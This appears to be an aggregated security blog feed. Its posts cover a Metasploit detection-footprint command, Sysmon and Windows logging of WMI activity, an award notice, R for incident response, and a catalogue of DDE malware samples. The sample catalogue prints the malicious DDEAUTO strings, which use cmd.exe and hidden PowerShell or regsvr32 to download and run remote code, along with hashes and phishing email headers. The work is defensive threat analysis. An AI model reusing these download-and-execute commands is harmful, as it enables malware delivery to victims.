          print_line("Command for listing local IP Addresses that can be used with LHOST.")
          print_line(opts.usage)
          return
        end
      end

      print_status("Local host IP addresses:")
      Socket.ip_address_list.each do |a|
        unless a.ipv4_loopback? || a.ipv6_linklocal? || a.ipv6_loopback?
          print_line("    #{a.ip_address}")
        end
      end
    end
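The same filtering logic can be run as a standalone Ruby snippet outside the framework (the output format here is my own, not the plugin's):

```ruby
require 'socket'

# Addresses usable as LHOST: everything except the IPv4/IPv6 loopback
# and IPv6 link-local addresses.
candidates = Socket.ip_address_list.reject do |a|
  a.ipv4_loopback? || a.ipv6_loopback? || a.ipv6_linklocal?
end

candidates.each { |a| puts a.ip_address }
```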

Those who have heard me talk on the podcast, listened to my presentations, or taken any of my classes know I like proper tradecraft and a deep understanding of one's tools. I added a command called check_footprint; the command will check your module against a list of API calls used in post modules to see whether the module may expose your actions.

msf > check_footprint -h


    -h        Command Help.
    -m <opt>  Module to check.

The -m option allows you to specify a post module or exploit persistence module, and it supports tab completion for the full name of the module. Once a module is specified, the command will check its source code and let you know if it uses API calls that may be logged by a defender. If you are in the context of a module, you can run the command without specifying the module name and it will examine the current module.


In the case that the module supports Shell type sessions, it will warn you that all actions will be performed with command line tools and may be logged.


The list of APIs is a simple one that can be extended. Here is the hash I use of APIs and descriptions of the possible negative footprint each will have on the target:

footprint_generators = {
          'cmd_exec' => 'This module will create a process that can be logged.',
          '<client|session>.sys.process.execute' => 'This module will create a process that can be logged.',
          'run_cmd' => 'This module will create a process that can be logged.',
          'check_osql' => 'This module will create a osql.exe process that can be logged.',
          'check_sqlcmd' => 'This module will create a sqlcmd.exe process that can be logged.',
          'wmic_query' => 'This module will create a wmic.exe process that can be logged.',
          'get_whoami' => 'This module will create a whoami.exe process that can be logged.',
          "service_create" => 'This module manipulates a service in a way that can be logged',
          "service_start" => 'This module manipulates a service in a way that can be logged',
          "service_change_config" => 'This module manipulates a service in a way that can be logged',
          "service_change_startup" => 'This module manipulates a service in a way that can be logged',
          "get_vss_device" => 'This module will create a wmic.exe process that can be logged.',
          "vss_list" => 'This module will create a wmic.exe process that can be logged.',
          "vss_get_ids" => 'This module will create a wmic.exe process that can be logged.',
          "vss_get_storage" => 'This module will create a wmic.exe process that can be logged.',
          "get_sc_details" => 'This module will create a wmic.exe process that can be logged.',
          "get_sc_param" => 'This module will create a wmic.exe process that can be logged.',
          "vss_get_storage_param" => 'This module will create a wmic.exe process that can be logged.',
          "vss_set_storage" => 'This module will create a wmic.exe process that can be logged.',
          "create_shadowcopy" => 'This module will create a wmic.exe process that can be logged.',
          "start_vss" => 'This module will create a wmic.exe process that can be logged.',
          "start_swprv" => 'This module manipulates a service in a way that can be logged',
          "execute_shellcode" => 'This module will create a thread that can be detected (Sysmon).',
          "is_in_admin_group" => 'This module will create a whoami.exe process that can be logged.',
          "upload_file" => 'This module uploads a file on to the target, AVs will examine the file and action may be logged if folder is audited.',
          "file_local_write" => 'This module writes to a file or may create one, action may be logged if folder is audited or examined by AV.',
          "write_file" => 'This module writes to a file or may create one, action may be logged if folder is audited or examined by AV.',
          "append_file" => 'This module writes to a file or may create one, action may be logged if folder is audited or examined by AV.',
          "rename_file" => 'This module renames a file or may create one, action may be logged if folder is audited or examined by AV.'
        }

I do plan on expanding the list and descriptions as time passes.

I hope you find these small changes useful, and that the check_footprint command makes you take into consideration what actions modules take when executed, since depending on the security posture of a target they could get you detected if you are a Red Teamer. If you are on a Blue Team, this may help you fine-tune your detections and give you ideas of what behaviors to look for.

Sysinternals Sysmon 6.10 Tracking of Permanent WMI Events

In my previous blog post I covered how Microsoft has enhanced WMI logging in the latest versions of their client and server operating systems. Sysmon version 6.10 also added specific events for logging permanent WMI event actions. The new events are:

  • Event ID 19: WmiEvent (WmiEventFilter activity detected). When a WMI event filter is registered, which is a method used by malware to execute, this event logs the WMI namespace, filter name and filter expression.
  • Event ID 20: WmiEvent (WmiEventConsumer activity detected). This event logs the registration of WMI consumers, recording the consumer name, log, and destination.
  • Event ID 21: WmiEvent (WmiEventConsumerToFilter activity detected). When a consumer binds to a filter, this event logs the consumer name and filter path.

In version 6.10 Sysmon tracks the creation and deletion of instances of the __EventFilter class, any consumer-type class, and the __FilterToConsumerBinding class.

To look at the events it captures, let's create a sample configuration file that will log WMI events. The configuration file is the following:

<Sysmon schemaversion="3.4">
  <EventFiltering>
    <WmiEvent onmatch='exclude'>
    </WmiEvent>
  </EventFiltering>
</Sysmon>

We can save this file as test.xml and apply it by running sysmon -c .\test.xml from a cmd or PowerShell console running as administrator. When we run sysmon -c to list the configuration we should see something like this:

System Monitor v6.10 - System activity monitor
Copyright (C) 2014-2017 Mark Russinovich and Thomas Garnier
Sysinternals -

Current configuration:
 - Service name:                  Sysmon
 - Driver name:                   SysmonDrv
 - HashingAlgorithms:             SHA256
 - Network connection:            disabled
 - Image loading:                 disabled
 - CRL checking:                  disabled
 - Process Access:                disabled

Rule configuration (version 3.40):
 - WmiEvent                           onmatch: exclude
 - WmiEvent                           onmatch: exclude
 - WmiEvent                           onmatch: exclude

We will use Windows PowerShell to create a permanent event that will log service state changes to a text file.

We start by creating a __EventFilter that will check for a modification of the Win32_Service class every 5 seconds. 

#Creating a new event filter
$ServiceFilter = ([wmiclass]"\\.\root\subscription:__EventFilter").CreateInstance()

# Set the properties of the instance
$ServiceFilter.QueryLanguage = 'WQL'
$ServiceFilter.Query = "select * from __instanceModificationEvent within 5 where targetInstance isa 'win32_Service'"
$ServiceFilter.Name = "ServiceFilter"
$ServiceFilter.EventNamespace = 'root\cimv2'

# Sets the instance in the namespace
$FilterResult = $ServiceFilter.Put()
$ServiceFilterObj = $FilterResult.Path

Once the event filter is created, we see that an Event ID 19 is generated, and under EventData we see a Data element where the Operation attribute says Created.


Since I know that some APT groups associated with state actors are known to modify existing permanent events to blend into target environments, I decided to test whether modifying the current filter's Query would be logged, using the following commands in the PowerShell window:

$ServiceFilter.Query = "select DisplayName from __instanceModificationEvent within 5 where targetInstance isa 'win32_Service'"
$FilterResult = $ServiceFilter.Put()

The modification was logged under Event ID 19. We can see that Operation is now blank; this means there is no logic in 6.10 to track modifications, but it still logs an action we can filter and trigger on. I informed one of the developers at Microsoft about this, and they will address it in the next release of Sysmon for all log types.


Let's now create a consumer that will write a log file on the C:\ drive, using the following Windows PowerShell code in the existing window where we created the filter.

#Creating a new event consumer
$LogConsumer = ([wmiclass]"\\.\root\subscription:LogFileEventConsumer").CreateInstance()

# Set properties of consumer
$LogConsumer.Name = 'ServiceConsumer'
$LogConsumer.Filename = "C:\Log.log"
$LogConsumer.Text = 'A change has occurred on the service: %TargetInstance.DisplayName%'

# Sets the instance in the namespace
$LogResult = $LogConsumer.Put()
$LogConsumerObj = $LogResult.Path

We can see the LogFileEventConsumer creation was logged with Event ID 20, and all of its properties were parsed under the EventData element of the log structure.


Let's create a __FilterToConsumerBinding class instance using the __EventFilter and LogFileEventConsumer instances we created earlier.

# Creating new binder
$instanceBinding = ([wmiclass]"\\.\root\subscription:__FilterToConsumerBinding").CreateInstance()

$instanceBinding.Filter = $ServiceFilterObj
$instanceBinding.Consumer = $LogConsumerObj
$result = $instanceBinding.Put()
$newBinding = $result.Path

The action is logged with Event ID 21, and the Filter and Consumer paths in the CIM database are included under EventData.



In conclusion, the logging in Sysmon expands on what we can already log in the newer versions of Windows, and it provides better consistency and insight into permanent WMI events and their components than the current Windows logging does. It does not cover temporary events, providers, or query errors, but it is a great start. I would recommend simply enabling logging of all events associated with WMI permanent events and not filtering in the configuration file, since their creation is not common in day-to-day operation and their modification is very rare, so the mere presence of the events is enough to warrant a look in a production environment.

DDE Command Execution malware samples

Here are a few samples related to the recent DDE command execution technique.

10/18/2017 InQuest/yara-rules 
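A minimal, hypothetical detection sketch (the pattern is mine, and far looser than the InQuest yara rules): flag DDE/DDEAUTO field codes that launch cmd.exe in extracted document text. Real .docx handling would first need to unzip the archive and read word/document.xml.

```ruby
# Very loose indicator: a DDE or DDEAUTO field invoking cmd.exe.
DDE_PATTERN = /\bDDE(AUTO)?\b.*\bcmd(\.exe)?\b/im

sample = 'DDEAUTO c:\windows\system32\cmd.exe "/k powershell ..."'
puts sample.match?(DDE_PATTERN)  # => true
```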


File information
List of available files:
Word documents:


File details with MD5 hashes:
Word documents:
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"\";IEX((new-object net.webclient).downloadstring('')) ")

2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
 2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"\";IEX((new-object net.webclient).downloadstring('')) ")

3. 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('');powershell -Command $e. 

4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' '); powershell -e $e " 

5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280 
 aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('');powershell -e_

6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p:// scrobj.dll" "For Security Reasons")

7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d  Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object'');powershell.exe -e $e # " "Filings_and_Forms.docx")

8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp

9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp

10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc

Payload Powershell

1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt

2. 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://

Payload PE

1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe

2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload

3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe  Poland payload

Message information

For the EDGAR campaign

 Received: from ( [])
by with ESMTP id 2dhb488ej6-1
(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)
for <snip>; Wed, 11 Oct 2017 00:09:20 -0400
Received: from salesapo by with local (Exim 4.89)
(envelope-from <>)
id 1e28HE-0001S5-Ew
for <snip>; Wed, 11 Oct 2017 00:05:48 -0400
To: <snip>
Subject: EDGAR Filings
X-PHP-Script: for,
X-PHP-Originating-Script: 658:class.phpmailer.php
Date: Wed, 11 Oct 2017 04:05:48 +0000
From: EDGAR <>
Reply-To: EDGAR <>
Message-ID: <>
X-Mailer: PHPMailer 5.2.22 (
MIME-Version: 1.0
Content-Type: multipart/mixed;
Content-Transfer-Encoding: 8bit
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname -
X-AntiAbuse: Original Domain -
X-AntiAbuse: Originator/Caller UID/GID - [658 497] / [47 12]
X-AntiAbuse: Sender Address Domain -
X-Get-Message-Sender-Via: authenticated_id: salesapo/only user confirmed/virtual account not confirmed
X-Authenticated-Sender: salesapo
X-Source: /opt/cpanel/ea-php56/root/usr/bin/lsphp
X-Source-Args: lsphp:ntent/themes/sp/examples/send_edgar_corps.php
X-CLX-Shades: Junk
X-CLX-Response: <snip>
X-Proofpoint-Virus-Version: vendor=fsecure engine=2.50.10432:,, definitions=2017-10-10_08:,,
X-Proofpoint-Spam-Details: rule=spam policy=default score=99 priorityscore=1501 malwarescore=0
 suspectscore=0 phishscore=0 bulkscore=0 spamscore=0 clxscore=-262
 lowpriorityscore=0 impostorscore=0 adultscore=0 classifier=clx:Junk
 adjust=0 reason=mlx scancount=1 engine=8.0.1-1707230000

This is a multi-part message in MIME format.

Content-Type: multipart/alternative;

Content-Type: text/plain; charset=us-ascii

Important information about last changes in EDGAR Filings

Content-Type: text/html; charset=us-ascii

<b>Important information about last changes in EDGAR Filings</b><br/><br/>Attached document is directed to <snip>


Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document; name="EDGAR_Rules_2017.docx"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=EDGAR_Rules_2017.docx



for 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx

Received: from ( by ( with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id via Mailbox Transport; Thu, 12 Oct 2017 10:45:16 +0000
Received: from ( by ( with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id; Thu, 12 Oct 2017 10:45:15 +0000
Received: from
 (2603:10a6:800:a9::33) by
 (2603:10a6:4:a2::17) with Microsoft SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id; Thu, 12 Oct
 2017 10:45:14 +0000
Received: from (2a01:111:f400:7e04::133) by (2603:10a6:800:a9::33) with Microsoft
 SMTP Server (version=TLS1_2,
 cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id via Frontend
 Transport; Thu, 12 Oct 2017 10:45:14 +0000
Received: from ( by ( with Microsoft SMTP
 Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P384) id via Frontend Transport; Thu, 12 Oct 2017 10:45:12 +0000
Received: from <snip> ( by
 <snip>( with Microsoft SMTP
 Server (TLS) id 14.3.339.0; Thu, 12 Oct 2017 12:44:35 +0200
Received: from <snip> ( by
 <snip> with Microsoft SMTP Server
 id 8.3.389.2; Thu, 12 Oct 2017 11:43:42 +0100
Received: from (unknown []) by
 Forcepoint Email with ESMTPS id AC3EDEB6D852BD348649; Thu, 12 Oct 2017
 11:43:38 +0100 (CET)
Received: from (localhost []) by (MailControl) with ESMTP id v9CAhaCs039950; Thu,
 12 Oct 2017 11:43:36 +0100
Received: from localhost.localdomain (localhost.localdomain []) by (MailControl) id v9CAhaRp039947; Thu, 12 Oct 2017
 11:43:36 +0100
Received: from (
 []) by (envelope-sender
 <>) (MIMEDefang) with ESMTP id
 v9CAhZoc039719 (TLS bits=256 verify=NO); Thu, 12 Oct 2017 11:43:36 +0100
Received: from authenticated-user ( [])
(using TLSv1 with cipher ECDHE-RSA-AES256-SHA (256/256 bits)) (No client
 certificate requested) by (Postfix) with ESMTPSA id
 571CD1511D4; Thu, 12 Oct 2017 06:43:35 -0400 (EDT)
From: Emmanuel Chatta <>
To: <snip>
Subject: Document
Thread-Topic: Document
Thread-Index: AQHTQ0cx2UbfjWEaCEK0bdQsLAkUYA==
Date: Thu, 12 Oct 2017 10:43:35 +0000
Message-ID: <>
Content-Language: en-US
X-MS-Exchange-Organization-AuthSource: <snip>
X-MS-Has-Attach: yes
received-spf: Fail ( domain of <snip> does
 not designate as permitted sender); client-ip=;
x-scanned-by: MailControl 44278.1987 ( on
x-mailcontrol-inbound: 4HEeExWtV!H1jiRXZJTT7wjEcFneOidAa+WVdv9sScH43ayzJcnLn4fvVkSq3YGx
x-ms-publictraffictype: Email
X-Microsoft-Exchange-Diagnostics: 1;AM4PR08MB2659;27:42C8MVC/6E4KnuK79xnDQihs/aWUnFSYSvMpUq/ZWFgliSK+uNXwEUaalqg0K4Ukdn7mPjI/6bOflK6H4WqZhQpH28iVAkhECXI6saRJPgqIf8Vn6JKx/rSyKhnUCz+c
Content-Type: multipart/mixed;
MIME-Version: 1.0

McRee added to ISSA’s Honor Roll for Lifetime Achievement

HolisticInfoSec's Russ McRee was pleased to be added to ISSA International's Honor Roll this month, a lifetime achievement award recognizing an individual's sustained contributions to the information security community, the advancement of the association and enhancement of the professionalism of the membership.
According to the press release:
"Russ McRee has a strong history in the information security as a teacher, practitioner and writer. He is responsible for 107 technical papers published in the ISSA Journal under his Toolsmith byline in 2006-2015. These articles represent a body of knowledge for the hands-on practitioner that is second to none. These titles span an extremely wide range of deep network security topics. Russ has been an invited speaker at the key international computer security venues including DEFCON, Derby Con, BlueHat, Black Hat, SANSFIRE, RSA, and ISSA International."
Russ greatly appreciates this honor and would like to extend congratulations to the ten other ISSA 2017 award winners. Sincere gratitude to Briana and Erin McRee, Irvalene Moni, Eric Griswold, Steve Lynch, and Thom Barrie for their extensive support over these many years.

toolsmith #128 – DFIR Redefined: Deeper Functionality for Investigators with R – Part 1

“To competently perform rectifying security service, two critical incident response elements are necessary: information and organization.” ~ Robert E. Davis

I've been presenting DFIR Redefined: Deeper Functionality for Investigators with R across the country at various conference venues and thought it would be helpful to provide details for readers.
The basic premise?
Incident responders and investigators need all the help they can get.
Let me lay just a few statistics on you, from's The Challenges of Incident Response, Nov 2016. Per their respondents in a survey of security professionals:
  • 38% reported an increase in the number of hours devoted to incident response
  • 42% reported an increase in the volume of incident response data collected
  • 39% indicated an increase in the volume of security alerts
In short, according to Nathan Burke, “It’s just not mathematically possible for companies to hire a large enough staff to investigate tens of thousands of alerts per month, nor would it make sense.”
The 2017 SANS Incident Response Survey, compiled by Matt Bromiley in June, reminds us that “2016 brought unprecedented events that impacted the cyber security industry, including a myriad of events that raised issues with multiple nation-state attackers, a tumultuous election and numerous government investigations.” Further, "seemingly continuous leaks and data dumps brought new concerns about malware, privacy and government overreach to the surface.”
Finally, the survey shows that IR teams are:
  • Detecting the attackers faster than before, with a drastic improvement in dwell time
  • Containing incidents more rapidly
  • Relying more on in-house detection and remediation mechanisms
To that end, what concepts and methods further enable handlers and investigators as they continue to strive for faster detection and containment? Data science and visualization sure can’t hurt. How can we be more creative to achieve “deeper functionality”? I propose a two-part series on Deeper Functionality for Investigators with R with the following DFIR Redefined scenarios:
  • Have you been pwned?
  • Visualization for malicious Windows Event Id sequences
  • How do your potential attackers feel, or can you identify an attacker via sentiment analysis?
  • Fast Frugal Trees (decision trees) for prioritizing criticality
R is “100% focused and built for statistical data analysis and visualization” and “makes it remarkably simple to run extensive statistical analysis on your data and then generate informative and appealing visualizations with just a few lines of code.”

With R you can interface with data via file ingestion, database connection, APIs and benefit from a wide range of packages and strong community investment.
From the Win-Vector Blog, per John Mount “not all R users consider themselves to be expert programmers (many are happy calling themselves analysts). R is often used in collaborative projects where there are varying levels of programming expertise.”
I propose that this represents the vast majority of us, we're not expert programmers, data scientists, or statisticians. More likely, we're security analysts re-using code for our own purposes, be it red team or blue team. With a very few lines of R investigators might be more quickly able to reach conclusions.
All the code described in the post can be found on my GitHub.

Have you been pwned?

I covered this scenario in an earlier post; I'll refer you to Toolsmith Release Advisory: Steph Locke's HIBPwned R package.

Visualization for malicious Windows Event Id sequences

Windows Events by Event ID present excellent sequenced visualization opportunities. A hypothetical scenario for this visualization might include multiple failed logon attempts (4625) followed by a successful logon (4624), then various malicious sequences. A fantastic reference paper built on these principles is Intrusion Detection Using Indicators of Compromise Based on Best Practices and Windows Event Logs. An additional opportunity for such sequence visualization includes Windows processes by parent/children. One R library particularly well suited to this is TraMineR: Trajectory Miner for R. This package is for mining, describing, and visualizing sequences of states or events, and more generally discrete sequence data. Its primary aim is the analysis of biographical longitudinal data in the social sciences, such as data describing careers or family trajectories, and a BUNCH of other categorical sequence data. Somehow, though, the project page fails to mention malicious Windows Event ID sequences. :-) Consider Figures 1 and 2 as retrieved from the above-mentioned paper. Figure 1 shows text sequence descriptions, followed by their related Windows Event IDs in Figure 2.

Figure 1
Figure 2
Taking related log data, parsing and counting it for visualization with R would look something like Figure 3.

Figure 3
How much R code does it take to visualize this data with a beautiful, interactive sunburst visualization? Three lines, not counting white space and comments, as seen in the video below.

Basics of Tracking WMI Activity

WMI (Windows Management Instrumentation) has been part of the Windows operating system since Windows 2000. The technology has been of great value to system administrators by providing ways to pull all types of information, configure components, and take action based on the state of several components of the OS. Due to this flexibility it has been abused by attackers who saw its potential since its early inclusion in the OS.

As security practitioners, it is one of the technologies on Microsoft Windows that is of great importance to master. Until recently there was little to no logging of the actions one could take using WMI. Blue Teams were left leveraging third-party tools or coding their own solutions to cover the gaps; for many years this allowed the abuse of WMI by Red Teams simulating the very actions that attackers of all kinds have used in their day-to-day operations. We will take a look at how Microsoft improved the logging of WMI actions.

The WMI Activity Provider

Until Windows 2012, the WMI-Activity event log provider was mostly for logging debug and trace information for WMI when it was enabled. With that release of Windows it was expanded to include an Operational log that records several actions. Let's take a look at the provider itself and what it offers. For this we will use PowerShell and the Get-WinEvent cmdlet to get the information.

We start by getting the object representing the provider:

PS C:\> $WmiProv = Get-WinEvent -ListProvider "Microsoft-Windows-WMI-Activity"
PS C:\> $WmiProv

Name     : Microsoft-Windows-WMI-Activity
LogLinks : {Microsoft-Windows-WMI-Activity/Trace, Microsoft-Windows-WMI-Activity/Operational, Microsoft-Windows-WMI-Activity/Debug}
Opcodes  : {}
Tasks    : {}

PowerShell formats the output of this object, so we need to pipe it to the Format-List cmdlet to see all of its properties and which of them have values set.

PS C:\> $WmiProv | Format-List -Property *

ProviderName      : Microsoft-Windows-WMI-Activity
Name              : Microsoft-Windows-WMI-Activity
Id                : 1418ef04-b0b4-4623-bf7e-d74ab47bbdaa
MessageFilePath   : C:\WINDOWS\system32\wbem\WinMgmtR.dll
ResourceFilePath  : C:\WINDOWS\system32\wbem\WinMgmtR.dll
ParameterFilePath :
HelpLink          : Corporation&ProdName=Microsoft® Windows® Operating
DisplayName       : Microsoft-Windows-WMI-Activity
LogLinks          : {Microsoft-Windows-WMI-Activity/Trace, Microsoft-Windows-WMI-Activity/Operational, Microsoft-Windows-WMI-Activity/Debug}
Levels            : {win:Error, win:Informational}
Opcodes           : {}
Keywords          : {}
Tasks             : {}
Events            : {1, 2, 3, 11...}

Let's take a look at the LogLinks property to see where the provider saves its events.

PS C:\> $WmiProv.LogLinks

LogName                                    IsImported DisplayName
-------                                    ---------- -----------
Microsoft-Windows-WMI-Activity/Trace            False
Microsoft-Windows-WMI-Activity/Operational      False
Microsoft-Windows-WMI-Activity/Debug            False

The one we are interested in is Microsoft-Windows-WMI-Activity/Operational. Now that we have identified the specific event log name in which the events are saved, we can take a look at the events the provider generates.

An event provider can generate anywhere from a few events to over a hundred, so let's see how many events this provider generates using the Measure-Object cmdlet:

PS C:\> $WmiProv.Events | Measure-Object

Count    : 22
Average  :
Sum      :
Maximum  :
Minimum  :
Property :

We see that the provider generates 22 events. Let's take a look at how each event object is composed using the Get-Member cmdlet.

PS C:\> $WmiProv.Events | Get-Member

   TypeName: System.Diagnostics.Eventing.Reader.EventMetadata

Name        MemberType Definition
----        ---------- ----------
Equals      Method     bool Equals(System.Object obj)
GetHashCode Method     int GetHashCode()
GetType     Method     type GetType()
ToString    Method     string ToString()
Description Property   string Description {get;}
Id          Property   long Id {get;}
Keywords    Property   System.Collections.Generic.IEnumerable[System.Diagnostics.Eventing.Reader.EventKeyword] Keywords {get;}
Level       Property   System.Diagnostics.Eventing.Reader.EventLevel Level {get;}
LogLink     Property   System.Diagnostics.Eventing.Reader.EventLogLink LogLink {get;}
Opcode      Property   System.Diagnostics.Eventing.Reader.EventOpcode Opcode {get;}
Task        Property   System.Diagnostics.Eventing.Reader.EventTask Task {get;}
Template    Property   string Template {get;}
Version     Property   byte Version {get;}

We can see that each event has a LogLink property whose value is of type System.Diagnostics.Eventing.Reader.EventLogLink, an object in itself. We can quickly take a peek into the object to see what the values are and how they are formatted.

PS C:\> $WmiProv.Events[0].LogLink

LogName                              IsImported DisplayName
-------                              ---------- -----------
Microsoft-Windows-WMI-Activity/Trace      False

PS C:\> $WmiProv.Events[0].LogLink | gm

   TypeName: System.Diagnostics.Eventing.Reader.EventLogLink

Name        MemberType Definition
----        ---------- ----------
Equals      Method     bool Equals(System.Object obj)
GetHashCode Method     int GetHashCode()
GetType     Method     type GetType()
ToString    Method     string ToString()
DisplayName Property   string DisplayName {get;}
IsImported  Property   bool IsImported {get;}
LogName     Property   string LogName {get;}

We can now filter for the events we want to take a look at.

PS C:\> $WmiProv.Events | Where-Object {$_.LogLink.LogName -eq "Microsoft-Windows-WMI-Activity/Operational"}

Id          : 5857
Version     : 0
LogLink     : System.Diagnostics.Eventing.Reader.EventLogLink
Level       : System.Diagnostics.Eventing.Reader.EventLevel
Opcode      : System.Diagnostics.Eventing.Reader.EventOpcode
Task        : System.Diagnostics.Eventing.Reader.EventTask
Keywords    : {}
Template    : <template xmlns="">
                <data name="ProviderName" inType="win:UnicodeString" outType="xs:string"/>
                <data name="Code" inType="win:HexInt32" outType="win:HexInt32"/>
                <data name="HostProcess" inType="win:UnicodeString" outType="xs:string"/>
                <data name="ProcessID" inType="win:UInt32" outType="xs:unsignedInt"/>
                <data name="ProviderPath" inType="win:UnicodeString" outType="xs:string"/>

Description : %1 provider started with result code %2. HostProcess = %3; ProcessID = %4; ProviderPath = %5

Id          : 5858
Version     : 0
LogLink     : System.Diagnostics.Eventing.Reader.EventLogLink
Level       : System.Diagnostics.Eventing.Reader.EventLevel
Opcode      : System.Diagnostics.Eventing.Reader.EventOpcode
Task        : System.Diagnostics.Eventing.Reader.EventTask
Keywords    : {}
Template    : <template xmlns="">
                <data name="Id" inType="win:UnicodeString" outType="xs:string"/>
                <data name="ClientMachine" inType="win:UnicodeString" outType="xs:string"/>
                <data name="User" inType="win:UnicodeString" outType="xs:string"/>
                <data name="ClientProcessId" inType="win:UInt32" outType="xs:unsignedInt"/>
                <data name="Component" inType="win:UnicodeString" outType="xs:string"/>
                <data name="Operation" inType="win:UnicodeString" outType="xs:string"/>
                <data name="ResultCode" inType="win:HexInt32" outType="win:HexInt32"/>
                <data name="PossibleCause" inType="win:UnicodeString" outType="xs:string"/>

Description : Id = %1; ClientMachine = %2; User = %3; ClientProcessId = %4; Component = %5; Operation = %6; ResultCode = %7; PossibleCause = %8

Id          : 5859
Version     : 0
LogLink     : System.Diagnostics.Eventing.Reader.EventLogLink
Level       : System.Diagnostics.Eventing.Reader.EventLevel
Opcode      : System.Diagnostics.Eventing.Reader.EventOpcode
Task        : System.Diagnostics.Eventing.Reader.EventTask
Keywords    : {}
Template    : <template xmlns="">
                <data name="NamespaceName" inType="win:UnicodeString" outType="xs:string"/>
                <data name="Query" inType="win:UnicodeString" outType="xs:string"/>
                <data name="User" inType="win:UnicodeString" outType="xs:string"/>
                <data name="processid" inType="win:UInt32" outType="xs:unsignedInt"/>
                <data name="providerName" inType="win:UnicodeString" outType="xs:string"/>
                <data name="queryid" inType="win:UInt32" outType="xs:unsignedInt"/>
                <data name="PossibleCause" inType="win:UnicodeString" outType="xs:string"/>

Description : Namespace = %1; NotificationQuery = %2; OwnerName = %3; HostProcessID = %4;  Provider= %5, queryID = %6; PossibleCause = %7

Id          : 5860
Version     : 0
LogLink     : System.Diagnostics.Eventing.Reader.EventLogLink
Level       : System.Diagnostics.Eventing.Reader.EventLevel
Opcode      : System.Diagnostics.Eventing.Reader.EventOpcode
Task        : System.Diagnostics.Eventing.Reader.EventTask
Keywords    : {}
Template    : <template xmlns="">
                <data name="NamespaceName" inType="win:UnicodeString" outType="xs:string"/>
                <data name="Query" inType="win:UnicodeString" outType="xs:string"/>
                <data name="User" inType="win:UnicodeString" outType="xs:string"/>
                <data name="processid" inType="win:UInt32" outType="xs:unsignedInt"/>
                <data name="MachineName" inType="win:UnicodeString" outType="xs:string"/>
                <data name="PossibleCause" inType="win:UnicodeString" outType="xs:string"/>

Description : Namespace = %1; NotificationQuery = %2; UserName = %3; ClientProcessID = %4, ClientMachine = %5; PossibleCause = %6

Id          : 5861
Version     : 0
LogLink     : System.Diagnostics.Eventing.Reader.EventLogLink
Level       : System.Diagnostics.Eventing.Reader.EventLevel
Opcode      : System.Diagnostics.Eventing.Reader.EventOpcode
Task        : System.Diagnostics.Eventing.Reader.EventTask
Keywords    : {}
Template    : <template xmlns="">
                <data name="Namespace" inType="win:UnicodeString" outType="xs:string"/>
                <data name="ESS" inType="win:UnicodeString" outType="xs:string"/>
                <data name="CONSUMER" inType="win:UnicodeString" outType="xs:string"/>
                <data name="PossibleCause" inType="win:UnicodeString" outType="xs:string"/>

Description : Namespace = %1; Eventfilter = %2 (refer to its activate eventid:5859); Consumer = %3; PossibleCause = %4

